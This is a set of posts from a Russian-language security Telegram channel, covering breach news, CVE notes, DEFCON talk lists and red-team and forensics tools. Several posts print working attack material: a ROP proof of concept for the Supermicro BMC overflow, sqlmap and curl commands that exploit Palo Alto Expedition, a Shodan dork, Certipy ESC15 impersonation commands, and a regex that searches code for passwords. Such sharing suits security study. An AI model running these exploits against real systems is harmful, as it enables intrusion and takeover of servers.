SecuriXy.kz

Хакеры заявили о взломе крупнейшей американской компании, специализирующейся на производстве сетевого оборудования.

— Среди скомпрометированных данных: проекты GitHub и GitLab, учетные записи и сертификаты безопасности, клиентские токены API, контейнеры AWS и SSL-сертификаты, а также сборки Docker и контейнеры Azure.

https://t.me/BleepingComputer/20855

https://t.me/BleepingComputer/20880

https://sec.cloudapps.cisco.com/security/center/resources/october_15_2024

#cisco #databreach #breach #циско

Критическая уязвимость #CVE-2024-21216 в Oracle #WebLogic Server - Позволяет неаутентифицированному злоумышленнику, имеющему доступ к сети через T3 и IIOP привести к полному захвату сервера.

CVSS 3.1 Score: 9.8
Уязвимы версии: с 12.2.1.4.0 по 14.1.1.0.0

https://github.com/advisories/GHSA-r389-865g-hcg3

💻 Exploiting Windows Kernel via Kernel Streaming Proxying

An in-depth look at CVE-2024-30090, a vulnerability in Kernel Streaming, allowing privilege escalation via malformed IOCTL requests. By leveraging KS Event mishandling during 32-bit to 64-bit conversions, can exploit the bug pattern to gain arbitrary kernel mode access.

🔗 Research:
Proxying to Kernel - Part I
Proxying to Kernel - Part II

🔗 Source:
https://github.com/Dor00tkit/CVE-2024-30090

#windows #streaming #kernel #cve #poc

Всем привет. Собрал для вас материалы c тематических Adversary Village, Bug Bounty Village и AppSec Village последнего DEFCON.

🥷🏼 Adversary Village

Master Splinter’s initial physical access dojo - Storytelling of a complex adversarial
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Tough Adversary - Don’t Blame Sun Tzu
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Kubernetes Attack Simulation - The Definitive Guide
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Exploiting Voice Cloning in Adversarial Simulation
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

MFT - Malicious Fungible Tokens
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Evading Modern Defenses When Phishing with Pixels
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Sneaky Extensions - The MV3 Escape Artists
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Responding to Breaches, Ransomware, and State - Sponsored Threat Actors
🎬 Видео на YouTube
💾 Видео MP4


💰 Bug Bounty Village

Blaklis - From Easy Wins to Epic Challenges
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Leveraging AI for Smarter Bug Bounties
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Efficient Bug Bounty Automation Techniques
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Hunters and Gatherers - A Deep Dive into the World of Bug Bounties
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Top War Stories from a TryHard Bug Bounty Hunter
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Reflections on a Decade in Bug Bounties - Experiences and Major Takeaways
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Practical Exploitation of DoS in Bug Bounty
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка


⚙️ AppSec Village

Maturing Your Application Security Program
🎬 Видео на YouTube

Navigating the Cyber Security Labyrinth Choose Your Own Security Adventure
🎬 Видео на YouTube

Gridlock The Dual Edged Sword of EV and Solar APIs in Grid Security
🎬 Видео на YouTube

The Missing Link How we collect and leverage SBOMs
🎬 Видео на YouTube

BOLABuster-Harnessing LLMs for Automating BOLA Detection
🎬 Видео на YouTube

0.0.0.0 Day Exploiting Localhost APIs From The Browser
🎬 Видео на YouTube

Ticking SQLi
🎬 Видео на YouTube

Transforming AppSec Protecting 'Everything as Code'
🎬 Видео на YouTube

The Immortal Retrofuturism of Mainframes and How to Keep Them Safe
🎬 Видео на YouTube

The Darkest Side of Bug Bounty (jhaddix)
🎬 Видео на YouTube

Speed Bumps and Speed HacksP: Adventures in Car Mfg Security
🎬 Видео на YouTube

Securing Frontends at Scale: Paving our Way to Post XSS World
🎬 Видео на YouTube

Defeating Secure Code Review GPT Hallucinations
🎬 Видео на YouTube

Relative Path File Injection The Next Evolution in RPO
🎬 Видео на YouTube

Your CI CD Pipeline Is Vulnerable, But It's Not Your Fault
🎬 Видео на YouTube

AppSec Considerations From the Casino Industry
🎬 Видео на YouTube

Lessons Learned from Building and Defending LLM Applications
🎬 Видео на YouTube

Web2 Meets Web3 Hacking Decentralized Applications
🎬 Видео на YouTube

Using EPSS for Better Management Vulnerability Management
🎬 Видео на YouTube

Hacking Corporate Banking for Fun and Profit
🎬 Видео на YouTube

Fine Grained Authorisation with Relationship Based Access Control
🎬 Видео на YouTube

Got 99 problems but prompt injection ain't watermelon
🎬 Видео на YouTube


🔗 Скачать бесплатно, без СМС и регистрации:
Все материалы Villages ~ 6.3 GiB
Плейлист на YouTube с AppSec Village

Инструмент для анализа изменений файлов и создания временной шкалы на Linux-системах.

Для вывода отчёта в
HTML:

python3 timeline_graph.py  -start-date 14.10.2024 -end-date 15.10.2024 -html -f timeline_report.html  -hash md5

CSV:

python3 timeline_graph.py -start-date 14.10.2024 -end-date 15.10.2024 -csv -f timeline_report.csv -hash md5

С графом запускать так:

python3 timeline_graph.py -start-date 14.10.2024 -end-date 15.10.2024 -u USERNAME -html -f timeline_report.html -hash md5 -graph

https://github.com/cleverg0d/Forensics/tree/main/Linux_Forensics

Спасибо Jaroslav Shmelev за идею. Чутка улучшил добавив многопоточность (ThreadPoolExecutor) и вывод HTML-отчета c таймлайном и в CSV и фильтрацию артефактов и всякие фильтрафии по датам и имени юзера и тп.

#Forensics #Linux #TimeLine

Exploit for Windows Kernel-Mode Driver Elevation of Privilege Flaw (CVE-2024-35250)

Microsoft-Analyzer-Suite (Community Edition)

A collection of PowerShell scripts for analyzing data from Microsoft 365 and Microsoft Entra ID.

https://github.com/evild3ad/Microsoft-Analyzer-Suite

#Velociraptor быстро стал одним из моих любимых инструментов для расследований #DFIR.
Новая функция таймлайна (#timeline), доступная в версии 0.73 - это шедевр!

https://docs.velociraptor.app/blog/2024/2024-09-12-timelines/

Timelinize

Я уже много раз говорил, что люблю метод разложения на таймлайне, как один из самых наглядных в процессе расследований. И похоже у нас появился претендент на мега-инструмент для этого (правда в очень ранней стадии разработки).
Timelinize позволяет разложить на временную шкалу любые типы данных. В ручном, полуавтоматическом или полностью в автоматическом режиме. Просто сущности, посты в социальных сетях, комментарии, геокоординаты, файлы и т.д.

Работает пока нестабильно, но потенциал виден уже сейчас-огромный!

Всех с пятницей,

Для тех, кто увлекается прохождением машин и заданий (CTF) на платформе HTB (Hack The Box) мы создали русскоязычный чат с каналом для того, чтобы Вы общались, делились опытом с коллегами со всего СНГ и лампово проводили время за решением задачек.

https://t.me/+58bkJZ8q0IQzZTMy

Класический #grep оказывается справляется не очень, когда дело идет о больших данных.

Советуем использовать #ripgrep
Nix

sudo apt install ripgrep

MacOS

brew install ripgrep

Пример поиска паролей, IP и емейлов в исходниках с исключением файлов изображений:

rg -i --glob '!*.{png,jpg,jpeg,gif,svg,bmp,webp}' '(password|passwd|pwd|pass)\s*=\s*["'"'"'][^"'"'"']+["'"'"']|\b(\d{1,3}\.){3}\d{1,3}\b|[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}' .

#tips #bash #terminal

Представьте себе на минутку, что Вы крутили скулю (#SQLi) долго и не простую, а какой-нибудь Boolean-based Blind, байпася при этом ваф уже 2-3 суток дампите таблицы и колонки посимвольно и тут бац и обрывчики... Боль? не то слово!

Так вот, обработать руками сессионный session.sqlite крайне не простая задача, но скульмап (#sqlmap) это за нас придумал очень давно. Я действительно не знал но оч помогло. Просто добавьте вконце Вашего запроса

-s session.sqlite --offline

и вся сессия превратиться в красивый и удобно читаемый CSV.

https://github.com/sqlmapproject/sqlmap/issues/4127

"Полупальто" их бин больной совсем или Palo Alto из N-Day до полной компроментации

[**CVE-2024-9465: Palo Alto Expedition Unauthenticated SQL Injection**](https://github.com/horizon3ai/CVE-2024-9465)

Скульмапом тащим таблицу юзеров:

python3 sqlmap.py -u "https://10.0.40.64/bin/configurations/parsers/Checkpoint/CHECKPOINT.php?action=im port&type=test&project=pandbRBAC&signatureid=1" -p signatureid -T users --dump

CVE-2024-5910: Отсутствие аутентификации приводит к захвату учетной записи администратора злоумышленниками, имеющими доступ к сети

curl -k 'https://10.0.40.64/0S/startup/restore/restoreAdmin.php'

[**CVE-2024-9464: Palo Alto Expedition Authenticated Command Injection Exploit**](https://github.com/horizon3ai/CVE-2024-9464)

CVE-2024-9466: Cleartext Credentials in Logs

/home/userSpace/devices/debug.txt

Сервер Expedition хранит только API-ключи и не должен сохранять учетные данные в открытом виде, но в этом файле журнала были показаны все учетные данные, использованные в открытом виде. Об этой проблеме было сообщено, и ей присвоен номер CVE-2024-9466.

Blog: https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/

Shodan dork:

html:"Expedition Project"

Source: https://t.me/P0x3k/1966

В certipy завезли новый вектор атаки #ESC15 на центр сертификации ADCS, которая использует специфические настройки шаблонов сертификатов, которые соответствуют большинству первичных условий атаки ESC1 или на ESC3, а именно:

1. Низкие привилегии для пользователей при регистрации: Шаблон позволяет пользователям с низкими привилегиями регистрировать сертификаты.
2. Возможность указания произвольного Subject Alternative Name (SAN): Пользователь может задавать произвольные SAN, что может быть использовано для маскировки или других целей.
3. Использование Schema Version 1: Шаблон использует устаревшую версию схемы, которая может содержать дополнительные уязвимости.

Однако, в отличие от ESC1, шаблон не включает расширение ‘Client Authentication’ (EKU). Это создает дополнительные возможности для злоумышленников.

Примеры:
1. Запрос сертификата с указанием ‘Client Authentication’ EKU:

certipy req -ca CORP-DC-CA -target-ip 192.168.4.178 -u '[email protected]' -p 'Password1' -template "WebServer" -upn "[email protected]" --application-policies 'Client Authentication'

2. Запрос сертификата с указанием OID для ‘Client Authentication’:

certipy req -ca CORP-DC-CA -target-ip 192.168.4.178 -u '[email protected]' -p 'Password1' -template "WebServer" -upn "[email protected]" --application-policies '1.3.6.1.5.5.7.3.2'

-> В ESC3 основной вектор атаки связан с тем, что у злоумышленника есть доступ к шаблону, который уже содержит необходимый EKU (Client Authentication), и злоумышленник использует его для подделки учетных данных.
-> В ESC15 злоумышленник может не иметь нужных EKU в шаблоне, но использует возможность добавления произвольных Application Policies, включая EKU, что делает этот шаблон уязвимым.

https://github.com/ly4k/Certipy/pull/228/commits/b9e87bbf09345d1364b6ff5108130bf9ee80fa47

Ретрансляция Kerberos. Хаброразбор.

После пучины долгих раздумий и определенных сложностей с новым инструментом для редактирования текстов на хабр, я хочу представить вам статью про релей кербероса. Если вы до сих пор откладывали эту интереснейшую тему для изучения, то пора взять себя в руки и погрузиться в глубины кербероса, DCOMа и релеев!

Вчера вышел еще один POC на Kerberos Relay — KrbRelay-SMBServer. Этот инструмент также не остался без внимания и я не забыл упомянуть его в статье.

Читать тут:

https://habr.com/ru/articles/848542/

Сканер уязвимостей Nuclei умеет и в Azure
https://blog.projectdiscovery.io/azure-config-review-with-nuclei/

и в AWS
https://blog.projectdiscovery.io/aws-cloud-security-config-review-using-nuclei-templates/

(Config Review) оказывается...
#nuclei #aws #azure

🛠 Всем привет. Я тут допилил тулу для рекона на основе информации из Azure (без аутентификации).

Смысл в том, чтобы доставать из ажура домены и инфу по тенанту (например какой у таргета SSO).

Давно хотел сделать такой аналог AADInternals, но без смс, регистрации, пауэршелла, дополнительных зависимостей. Только статический бинарник, только хардкор.

Тула поддерживает STDIN/STDOUT, поэтому можно использовать ее в пайплайнах с другими вещами, например от ProjectDiscovery.

Выглядит это безобразие так:

📖 Установка:

go install -v github.com/haxxm0nkey/azhunt@latest

или через репу

git clone https://github.com/haxxm0nkey/azhunt.git
cd azhunt
go build
mv azhunt /usr/local/bin/
azhunt 

⚙️ Режимы работы:

Базовый режим - тащит и инфу по тенанту и домены.

azhunt -d microsoft.com

Режим для интеграции с другими тулами (-silent)

azhunt -d microsoft.com -silent

Есть вывод в JSON, в файл, чтение доменов из файла.

🔗 Где исходники, Билли?
https://github.com/haxxm0nkey/azhunt

Хорошей пятницы вам!

📖 Тем временем в NetExec (nxc) подвезли поддержку протокола NFS.
Из функций сейчас доступен энум файловых шар (права и файлы рекурсивно), погрузка и разгрузка файлов.


Базовый энум

NetExec nfs IP --shares

Рекурсивный энум

NetExec nfs IP --enum-shares

Забираем файл

NetExec nfs IP --get-file /home/user/Desktop/test/lolkekpohek.txt lolkekpohek.txt

Заливаем файл

NetExec nfs IP --put-file lolkekpohek.txt /home/user/Desktop/

🔗 Где почитать подробнее:
Энум
https://www.netexec.wiki/nfs-protocol/enumeration

Льем/качаем файлы
https://www.netexec.wiki/nfs-protocol/download-and-upload-files

Исходники
https://github.com/Pennyw0rth/NetExec/tree/main/nxc/protocols/nfs

Мы знаем как админы не любят менять заводские пароли к админкам сереров типа iDrac, iLO и др. И вот вишинка #CVE-2024-36435
с CVSS 9.8 в прошивке BMC компании Supermicro в некоторых материнских платах X11, X12, H12, B12, X13, H13 и B13 (и модулях CMM6).

Неавторизованный пользователь может отправить в интерфейс поддельные данные, которые вызывают переполнение буфера стека и могут привести к произвольному RCE а на BMC.

https://www.binarly.io/blog/cve-2024-36435-deep-dive-the-years-most-critical-bmc-security-flaw

PoC:

# CVE-2024-36435 – Buffer overflow vulnerability in Supermicro BMC IPMI firmware due to unchecked length of user-supplied value

import base64
import requests

from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# set target and command values
target = "https://192.168.10.53:443/cgi/login.cgi"
command = "touch /tmp/BRLY"

libc_base = 0x76283000  # we try to guess
gadget_1_offset = 0x000D8874  # pop {r0, r1, r2, r3, fp, pc};
gadget_2_offset = 0x001026D4  # mov r0, sp; blx r3;
system_offset = 0x0003C4D4

print(f"Target: {target}")
print(f"Command: {command}")
print()
print(f"libc_base: {libc_base:#x}")
print(f"gadget_1_offset: {gadget_1_offset:#x}")
print(f"gadget_2_offset: {gadget_2_offset:#x}")
print(f"system_offset: {system_offset:#x}")
print()


payload = base64.b64encode(
    b"\x00" * 456
    + int.to_bytes(libc_base + gadget_1_offset, 4, "little")  # gadget_1
    + b"\x00" * 12
    + int.to_bytes(libc_base + system_offset, 4, "little")  # system
    + b"\x00" * 4
    + int.to_bytes(libc_base + gadget_2_offset, 4, "little")  # gadget_2
    + command.encode()
).decode()

data = f"name={payload}&pwd=&check=1"

print("Sending requests...")
i = 0
while True:
    print(f"Request: '{i}'")
    r = requests.post(target, data=data, verify=False)
    i += 1